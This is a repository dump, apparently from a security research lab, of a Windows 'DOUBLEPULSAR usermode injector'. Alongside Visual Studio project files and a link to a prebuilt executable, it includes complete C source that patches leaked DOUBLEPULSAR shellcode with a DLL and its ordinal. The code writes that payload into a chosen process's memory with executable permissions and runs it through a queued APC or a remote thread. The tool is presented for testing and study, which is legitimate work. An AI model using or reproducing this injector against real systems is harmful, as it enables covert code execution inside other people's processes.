├── .gitattributes
├── .gitignore
├── DOUBLEPULSAR-usermode-injector.exe
├── DOUBLEPULSAR-usermode-injector.sln
├── DOUBLEPULSAR-usermode-injector
    ├── DOUBLEPULSAR-usermode-injector.c
    ├── DOUBLEPULSAR-usermode-injector.vcxproj
    └── DOUBLEPULSAR-usermode-injector.vcxproj.filters
├── LICENSE
├── README.md
└── dopu-64bit-usermode-shellcode.bin


/.gitattributes:
--------------------------------------------------------------------------------
 1 | ###############################################################################
 2 | # Set default behavior to automatically normalize line endings.
 3 | ###############################################################################
 4 | * text=auto
 5 | 
 6 | ###############################################################################
 7 | # Set default behavior for command prompt diff.
 8 | #
 9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs     diff=csharp
14 | 
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following 
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln       merge=binary
26 | #*.csproj    merge=binary
27 | #*.vbproj    merge=binary
28 | #*.vcxproj   merge=binary
29 | #*.vcproj    merge=binary
30 | #*.dbproj    merge=binary
31 | #*.fsproj    merge=binary
32 | #*.lsproj    merge=binary
33 | #*.wixproj   merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj   merge=binary
36 | #*.wwaproj   merge=binary
37 | 
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg   binary
44 | #*.png   binary
45 | #*.gif   binary
46 | 
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | # 
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the 
52 | # entries below.
53 | ###############################################################################
54 | #*.doc   diff=astextplain
55 | #*.DOC   diff=astextplain
56 | #*.docx  diff=astextplain
57 | #*.DOCX  diff=astextplain
58 | #*.dot   diff=astextplain
59 | #*.DOT   diff=astextplain
60 | #*.pdf   diff=astextplain
61 | #*.PDF   diff=astextplain
62 | #*.rtf   diff=astextplain
63 | #*.RTF   diff=astextplain
64 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | 
  4 | # User-specific files
  5 | *.suo
  6 | *.user
  7 | *.userosscache
  8 | *.sln.docstates
  9 | 
 10 | # User-specific files (MonoDevelop/Xamarin Studio)
 11 | *.userprefs
 12 | 
 13 | # Build results
 14 | [Dd]ebug/
 15 | [Dd]ebugPublic/
 16 | [Rr]elease/
 17 | [Rr]eleases/
 18 | x64/
 19 | x86/
 20 | bld/
 21 | [Bb]in/
 22 | [Oo]bj/
 23 | [Ll]og/
 24 | 
 25 | # Visual Studio 2015 cache/options directory
 26 | .vs/
 27 | # Uncomment if you have tasks that create the project's static files in wwwroot
 28 | #wwwroot/
 29 | 
 30 | # MSTest test Results
 31 | [Tt]est[Rr]esult*/
 32 | [Bb]uild[Ll]og.*
 33 | 
 34 | # NUNIT
 35 | *.VisualState.xml
 36 | TestResult.xml
 37 | 
 38 | # Build Results of an ATL Project
 39 | [Dd]ebugPS/
 40 | [Rr]eleasePS/
 41 | dlldata.c
 42 | 
 43 | # DNX
 44 | project.lock.json
 45 | project.fragment.lock.json
 46 | artifacts/
 47 | 
 48 | *_i.c
 49 | *_p.c
 50 | *_i.h
 51 | *.ilk
 52 | *.meta
 53 | *.obj
 54 | *.pch
 55 | *.pdb
 56 | *.pgc
 57 | *.pgd
 58 | *.rsp
 59 | *.sbr
 60 | *.tlb
 61 | *.tli
 62 | *.tlh
 63 | *.tmp
 64 | *.tmp_proj
 65 | *.log
 66 | *.vspscc
 67 | *.vssscc
 68 | .builds
 69 | *.pidb
 70 | *.svclog
 71 | *.scc
 72 | 
 73 | # Chutzpah Test files
 74 | _Chutzpah*
 75 | 
 76 | # Visual C++ cache files
 77 | ipch/
 78 | *.aps
 79 | *.ncb
 80 | *.opendb
 81 | *.opensdf
 82 | *.sdf
 83 | *.cachefile
 84 | *.VC.db
 85 | *.VC.VC.opendb
 86 | 
 87 | # Visual Studio profiler
 88 | *.psess
 89 | *.vsp
 90 | *.vspx
 91 | *.sap
 92 | 
 93 | # TFS 2012 Local Workspace
 94 | $tf/
 95 | 
 96 | # Guidance Automation Toolkit
 97 | *.gpState
 98 | 
 99 | # ReSharper is a .NET coding add-in
100 | _ReSharper*/
101 | *.[Rr]e[Ss]harper
102 | *.DotSettings.user
103 | 
104 | # JustCode is a .NET coding add-in
105 | .JustCode
106 | 
107 | # TeamCity is a build add-in
108 | _TeamCity*
109 | 
110 | # DotCover is a Code Coverage Tool
111 | *.dotCover
112 | 
113 | # NCrunch
114 | _NCrunch_*
115 | .*crunch*.local.xml
116 | nCrunchTemp_*
117 | 
118 | # MightyMoose
119 | *.mm.*
120 | AutoTest.Net/
121 | 
122 | # Web workbench (sass)
123 | .sass-cache/
124 | 
125 | # Installshield output folder
126 | [Ee]xpress/
127 | 
128 | # DocProject is a documentation generator add-in
129 | DocProject/buildhelp/
130 | DocProject/Help/*.HxT
131 | DocProject/Help/*.HxC
132 | DocProject/Help/*.hhc
133 | DocProject/Help/*.hhk
134 | DocProject/Help/*.hhp
135 | DocProject/Help/Html2
136 | DocProject/Help/html
137 | 
138 | # Click-Once directory
139 | publish/
140 | 
141 | # Publish Web Output
142 | *.[Pp]ublish.xml
143 | *.azurePubxml
144 | # TODO: Comment the next line if you want to checkin your web deploy settings
145 | # but database connection strings (with potential passwords) will be unencrypted
146 | #*.pubxml
147 | *.publishproj
148 | 
149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
150 | # checkin your Azure Web App publish settings, but sensitive information contained
151 | # in these scripts will be unencrypted
152 | PublishScripts/
153 | 
154 | # NuGet Packages
155 | *.nupkg
156 | # The packages folder can be ignored because of Package Restore
157 | **/packages/*
158 | # except build/, which is used as an MSBuild target.
159 | !**/packages/build/
160 | # Uncomment if necessary however generally it will be regenerated when needed
161 | #!**/packages/repositories.config
162 | # NuGet v3's project.json files produces more ignoreable files
163 | *.nuget.props
164 | *.nuget.targets
165 | 
166 | # Microsoft Azure Build Output
167 | csx/
168 | *.build.csdef
169 | 
170 | # Microsoft Azure Emulator
171 | ecf/
172 | rcf/
173 | 
174 | # Windows Store app package directories and files
175 | AppPackages/
176 | BundleArtifacts/
177 | Package.StoreAssociation.xml
178 | _pkginfo.txt
179 | 
180 | # Visual Studio cache files
181 | # files ending in .cache can be ignored
182 | *.[Cc]ache
183 | # but keep track of directories ending in .cache
184 | !*.[Cc]ache/
185 | 
186 | # Others
187 | ClientBin/
188 | ~$*
189 | *~
190 | *.dbmdl
191 | *.dbproj.schemaview
192 | *.jfm
193 | *.pfx
194 | *.publishsettings
195 | node_modules/
196 | orleans.codegen.cs
197 | 
198 | # Since there are multiple workflows, uncomment next line to ignore bower_components
199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
200 | #bower_components/
201 | 
202 | # RIA/Silverlight projects
203 | Generated_Code/
204 | 
205 | # Backup & report files from converting an old project file
206 | # to a newer Visual Studio version. Backup files are not needed,
207 | # because we have git ;-)
208 | _UpgradeReport_Files/
209 | Backup*/
210 | UpgradeLog*.XML
211 | UpgradeLog*.htm
212 | 
213 | # SQL Server files
214 | *.mdf
215 | *.ldf
216 | 
217 | # Business Intelligence projects
218 | *.rdl.data
219 | *.bim.layout
220 | *.bim_*.settings
221 | 
222 | # Microsoft Fakes
223 | FakesAssemblies/
224 | 
225 | # GhostDoc plugin setting file
226 | *.GhostDoc.xml
227 | 
228 | # Node.js Tools for Visual Studio
229 | .ntvs_analysis.dat
230 | 
231 | # Visual Studio 6 build log
232 | *.plg
233 | 
234 | # Visual Studio 6 workspace options file
235 | *.opt
236 | 
237 | # Visual Studio LightSwitch build output
238 | **/*.HTMLClient/GeneratedArtifacts
239 | **/*.DesktopClient/GeneratedArtifacts
240 | **/*.DesktopClient/ModelManifest.xml
241 | **/*.Server/GeneratedArtifacts
242 | **/*.Server/ModelManifest.xml
243 | _Pvt_Extensions
244 | 
245 | # Paket dependency manager
246 | .paket/paket.exe
247 | paket-files/
248 | 
249 | # FAKE - F# Make
250 | .fake/
251 | 
252 | # JetBrains Rider
253 | .idea/
254 | *.sln.iml
255 | 
256 | # CodeRush
257 | .cr/
258 | 
259 | # Python Tools for Visual Studio (PTVS)
260 | __pycache__/
261 | *.pyc


--------------------------------------------------------------------------------
/DOUBLEPULSAR-usermode-injector.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WithSecureLabs/doublepulsar-usermode-injector/711e16f510e3c8b56ad729f76f943f96397fa285/DOUBLEPULSAR-usermode-injector.exe


--------------------------------------------------------------------------------
/DOUBLEPULSAR-usermode-injector.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26403.7
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DOUBLEPULSAR-usermode-injector", "DOUBLEPULSAR-usermode-injector\DOUBLEPULSAR-usermode-injector.vcxproj", "{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Debug|x64.Build.0 = Debug|x64
18 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Debug|x86.Build.0 = Debug|Win32
20 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Release|x64.ActiveCfg = Release|x64
21 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Release|x64.Build.0 = Release|x64
22 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Release|x86.ActiveCfg = Release|Win32
23 | 		{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/DOUBLEPULSAR-usermode-injector/DOUBLEPULSAR-usermode-injector.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <Windows.h>
  3 | #include <TlHelp32.h>
  4 | 
  5 | typedef struct {
  6 | 	LPBYTE lpbData;
  7 | 	DWORD dwDataSize;
  8 | } BUFFER_WITH_SIZE;
  9 | 
 10 | typedef BUFFER_WITH_SIZE* PBUFFER_WITH_SIZE;
 11 | 
 12 | const SHELLC_DLL_SIZE_OFFSET = 0xf82;
 13 | const SHELLC_ORDINAL_OFFSET = 0xf86;
 14 | 
 15 | 
 16 | HANDLE hProcHeap;
 17 | 
 18 | void read_file(LPCSTR filename, PBUFFER_WITH_SIZE pBws)
 19 | {
 20 | 	HANDLE hFile;
 21 | 	LONGLONG llFileSize;
 22 | 	LARGE_INTEGER liFileSize;
 23 | 	DWORD dwBytesRead;
 24 | 	DWORD dwTotalBytesRead;
 25 | 	LPBYTE lpFileData;
 26 | 	BOOL bResult;
 27 | 
 28 | 	hFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
 29 | 		FILE_ATTRIBUTE_NORMAL, NULL);
 30 | 	if (hFile == INVALID_HANDLE_VALUE)
 31 | 	{
 32 | 		printf("Could not open file %s\n", filename);
 33 | 		exit(1);
 34 | 	}
 35 | 
 36 | 	bResult = GetFileSizeEx(hFile, &liFileSize);
 37 | 	if (!bResult)
 38 | 	{
 39 | 		printf("Error getting size of file %s\n", filename);
 40 | 		exit(1);
 41 | 	}
 42 | 	llFileSize = liFileSize.QuadPart;
 43 | 
 44 | 	lpFileData = HeapAlloc(hProcHeap, HEAP_ZERO_MEMORY, llFileSize);
 45 | 	if (lpFileData == NULL)
 46 | 	{
 47 | 		printf("Error allocating memory\n");
 48 | 		exit(1);
 49 | 	}
 50 | 
 51 | 	dwTotalBytesRead = 0;
 52 | 	do
 53 | 	{
 54 | 		bResult = ReadFile(hFile, lpFileData + dwTotalBytesRead,
 55 | 			llFileSize - dwTotalBytesRead, &dwBytesRead, NULL);
 56 | 		dwTotalBytesRead += dwBytesRead;
 57 | 	} while (!(bResult &&  dwBytesRead == 0) || !bResult);
 58 | 	if (!bResult)
 59 | 	{
 60 | 		printf("Error reading file %s\n", filename);
 61 | 		exit(1);
 62 | 	}
 63 | 
 64 | 	CloseHandle(hFile);
 65 | 
 66 | 	pBws->lpbData = lpFileData;
 67 | 	pBws->dwDataSize = llFileSize;
 68 | }
 69 | 
 70 | void construct_payload(LPCSTR shellcode_file, LPCSTR dll_file, long ordinal, PBUFFER_WITH_SIZE pBws)
 71 | {
 72 | 	BUFFER_WITH_SIZE shellcode;
 73 | 	BUFFER_WITH_SIZE dll;
 74 | 	DWORD dwPayloadSize;
 75 | 	LPBYTE lpbPayload;
 76 | 
 77 | 	read_file(shellcode_file, &shellcode);
 78 | 	read_file(dll_file, &dll);
 79 | 
 80 | 	dwPayloadSize = shellcode.dwDataSize + dll.dwDataSize;
 81 | 
 82 | 	lpbPayload = HeapAlloc(hProcHeap, HEAP_ZERO_MEMORY, dwPayloadSize);
 83 | 	if (lpbPayload == NULL)
 84 | 	{
 85 | 		printf("Error allocating memory\n");
 86 | 		exit(1);
 87 | 	}
 88 | 
 89 | 	// Edit shellcode to include ordinal and shellcode size
 90 | 	memcpy_s(shellcode.lpbData + SHELLC_DLL_SIZE_OFFSET,
 91 | 		shellcode.dwDataSize - SHELLC_DLL_SIZE_OFFSET, &(dll.dwDataSize), sizeof(dwPayloadSize));
 92 | 	memcpy_s(shellcode.lpbData + SHELLC_ORDINAL_OFFSET,
 93 | 		shellcode.dwDataSize - SHELLC_ORDINAL_OFFSET, &ordinal, sizeof(ordinal));
 94 | 
 95 | 	// Put it all together, shellcode + DLL
 96 | 	memcpy_s(lpbPayload, dwPayloadSize, shellcode.lpbData, shellcode.dwDataSize);
 97 | 	memcpy_s(lpbPayload + shellcode.dwDataSize, dwPayloadSize - shellcode.dwDataSize,
 98 | 		dll.lpbData, dll.dwDataSize);
 99 | 
100 | 	if (shellcode.lpbData != NULL)
101 | 		HeapFree(hProcHeap, 0, shellcode.lpbData);
102 | 	if (dll.lpbData != NULL)
103 | 		HeapFree(hProcHeap, 0, dll.lpbData);
104 | 
105 | 	pBws->lpbData = lpbPayload;
106 | 	pBws->dwDataSize = dwPayloadSize;
107 | }
108 | 
109 | char getConsoleChar()
110 | {
111 | 	char first_ch = NULL;
112 | 	int ch;
113 | 	for (int i = 0; (i < 80) && ((ch = getchar()) != EOF)
114 | 		&& (ch != '\n'); i++)
115 | 	{
116 | 		if (i == 0)
117 | 			first_ch = (char)ch;
118 | 	}
119 | 	return first_ch;
120 | }
121 | 
122 | void inject(DWORD pid, BUFFER_WITH_SIZE payload, BOOL useCreateRemoteProcess)
123 | {
124 | 	HANDLE hProc;
125 | 	LPVOID lpProcMem;
126 | 	BOOL bResult;
127 | 	SIZE_T dwBytesWritten;
128 | 
129 | 	if (useCreateRemoteProcess)
130 | 	{
131 | 		// More access rights needed for CreateRemoteProcess
132 | 		hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, pid);
133 | 	}
134 | 	else
135 | 	{
136 | 		hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, pid);
137 | 	}
138 | 
139 | 	if (hProc == NULL)
140 | 	{
141 | 		printf("Error opening process\n");
142 | 		exit(1);
143 | 	}
144 | 
145 | 	lpProcMem = VirtualAllocEx(hProc, NULL, payload.dwDataSize, MEM_COMMIT | MEM_RESERVE,
146 | 		PAGE_EXECUTE_READWRITE);
147 | 	if (lpProcMem == NULL)
148 | 	{
149 | 		printf("Error allocating memory in target process\n");
150 | 		exit(1);
151 | 	}
152 | 
153 | 	bResult = WriteProcessMemory(hProc, lpProcMem, payload.lpbData, payload.dwDataSize,
154 | 		&dwBytesWritten);
155 | 	if (!bResult)
156 | 	{
157 | 		printf("Error writing to process memory\n");
158 | 		exit(1);
159 | 	}
160 | 
161 | 
162 | 	if (useCreateRemoteProcess)
163 | 	{
164 | 		SECURITY_ATTRIBUTES secAtr;
165 | 		secAtr.nLength = sizeof(SECURITY_ATTRIBUTES);
166 | 		secAtr.bInheritHandle = FALSE;
167 | 		secAtr.lpSecurityDescriptor = NULL;
168 | 		CreateRemoteThread(hProc, &secAtr, 0, lpProcMem, NULL, 0, NULL);
169 | 	}
170 | 	else
171 | 	{
172 | 		// Find a threads in the target process
173 | 
174 | 		HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
175 | 		if (hSnapshot == INVALID_HANDLE_VALUE)
176 | 		{
177 | 			printf("Error getting thread information\n");
178 | 			exit(1);
179 | 		}
180 | 
181 | 		DWORD threadId = 0;
182 | 		THREADENTRY32 threadEntry;
183 | 		threadEntry.dwSize = sizeof(THREADENTRY32);
184 | 
185 | 		bResult = Thread32First(hSnapshot, &threadEntry);
186 | 		while (bResult)
187 | 		{
188 | 			bResult = Thread32Next(hSnapshot, &threadEntry);
189 | 			if (bResult)
190 | 			{
191 | 				if (threadEntry.th32OwnerProcessID == pid)
192 | 				{
193 | 					threadId = threadEntry.th32ThreadID;
194 | 
195 | 					// Some threads may not trigger the APC in a timely manner, so ask about each thread in turn
196 | 					// so you can keep queuing the APC until you see it fire.
197 | 					printf("Do you want to use thread %i? (y/n): ", threadId);
198 | 					char c = getConsoleChar();
199 | 					if (c == 'y' || c == 'Y')
200 | 					{
201 | 						printf("Using thread: %i\n", threadId);
202 | 						HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, threadId);
203 | 						if (hThread == NULL)
204 | 						{
205 | 							printf("Error opening thread, will continue to try any other threads...\n");
206 | 						}
207 | 						else
208 | 						{
209 | 							// Queue the APC
210 | 							DWORD dwResult = QueueUserAPC((PAPCFUNC)lpProcMem, hThread, 0);
211 | 							if (!dwResult)
212 | 							{
213 | 								printf("Error calling QueueUserAPC on thread, will continue to try any other threads...\n");
214 | 							}
215 | 							CloseHandle(hThread);
216 | 						}
217 | 					}
218 | 				}
219 | 			}
220 | 		}
221 | 
222 | 		if (!threadId)
223 | 		{
224 | 			printf("No threads found in target process\n");
225 | 		}
226 | 
227 | 		CloseHandle(hSnapshot);
228 | 	}
229 | 
230 | 	CloseHandle(hProc);
231 | }
232 | 
233 | 
234 | int main(int argc, char *argv[])
235 | {
236 | 	BUFFER_WITH_SIZE payload;
237 | 	LPCSTR shellcode_file;
238 | 	LPCSTR dll_file;
239 | 	DWORD pid;
240 | 	DWORD ordinal;
241 | 	BOOL useCreateRemoteProcess;
242 | 
243 | 	if (argc < 5)
244 | 	{
245 | 		printf("USAGE: <pid> <shellcode_file> <dll_to_inject> <ordinal_to_execute> [use_CreateRemoteProcess]\n");
246 | 		printf("\nThe last argument is optional, if specified 'true' then CreateRemoteProcess will be used instead of using an APC call which is the default way Doublepulsar works. This is to allow people to test it out in different ways.");
247 | 		printf("\nThe default is using APC. This will inject into ALL threads in the target, which makes it more likely one of them will trigger quickly. This is only suitable for testing as it may be undesirable to call the payload more than once.");
248 | 		exit(0);
249 | 	}
250 | 
251 | 	pid = atol(argv[1]);
252 | 	shellcode_file = argv[2];
253 | 	dll_file = argv[3];
254 | 	ordinal = atol(argv[4]);
255 | 	useCreateRemoteProcess = FALSE;
256 | 	if (argc >= 6)
257 | 	{
258 | 		useCreateRemoteProcess = TRUE;
259 | 	}
260 | 
261 | 	hProcHeap = GetProcessHeap();
262 | 	if (hProcHeap == NULL)
263 | 	{
264 | 		printf("Error allocating memory\n");
265 | 		exit(1);
266 | 	}
267 | 
268 | 	construct_payload(shellcode_file, dll_file, ordinal, &payload);
269 | 
270 | 	inject(pid, payload, useCreateRemoteProcess);
271 | 
272 | 	if (payload.lpbData != NULL)
273 | 		HeapFree(hProcHeap, 0, payload.lpbData);
274 | 
275 | 	return 0;
276 | }
277 | 


--------------------------------------------------------------------------------
/DOUBLEPULSAR-usermode-injector/DOUBLEPULSAR-usermode-injector.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{E92AB0A5-CB60-415C-9096-CA0F2A80FBEA}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>DOUBLEPULSARusermodeinjector</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>
 88 |       </PrecompiledHeader>
 89 |       <WarningLevel>Level3</WarningLevel>
 90 |       <Optimization>Disabled</Optimization>
 91 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |     </Link>
 97 |   </ItemDefinitionGroup>
 98 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 99 |     <ClCompile>
100 |       <PrecompiledHeader>
101 |       </PrecompiledHeader>
102 |       <WarningLevel>Level3</WarningLevel>
103 |       <Optimization>Disabled</Optimization>
104 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
105 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
106 |     </ClCompile>
107 |     <Link>
108 |       <SubSystem>Console</SubSystem>
109 |     </Link>
110 |   </ItemDefinitionGroup>
111 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
112 |     <ClCompile>
113 |       <WarningLevel>Level3</WarningLevel>
114 |       <PrecompiledHeader>
115 |       </PrecompiledHeader>
116 |       <Optimization>MaxSpeed</Optimization>
117 |       <FunctionLevelLinking>true</FunctionLevelLinking>
118 |       <IntrinsicFunctions>true</IntrinsicFunctions>
119 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
125 |       <OptimizeReferences>true</OptimizeReferences>
126 |     </Link>
127 |   </ItemDefinitionGroup>
128 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
129 |     <ClCompile>
130 |       <WarningLevel>Level3</WarningLevel>
131 |       <PrecompiledHeader>
132 |       </PrecompiledHeader>
133 |       <Optimization>MaxSpeed</Optimization>
134 |       <FunctionLevelLinking>true</FunctionLevelLinking>
135 |       <IntrinsicFunctions>true</IntrinsicFunctions>
136 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
137 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
138 |     </ClCompile>
139 |     <Link>
140 |       <SubSystem>Console</SubSystem>
141 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
142 |       <OptimizeReferences>true</OptimizeReferences>
143 |     </Link>
144 |   </ItemDefinitionGroup>
145 |   <ItemGroup>
146 |     <ClCompile Include="DOUBLEPULSAR-usermode-injector.c" />
147 |   </ItemGroup>
148 |   <ItemGroup>
149 |     <None Include="..\dopu-64bit-usermode-shellcode.bin" />
150 |   </ItemGroup>
151 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
152 |   <ImportGroup Label="ExtensionTargets">
153 |   </ImportGroup>
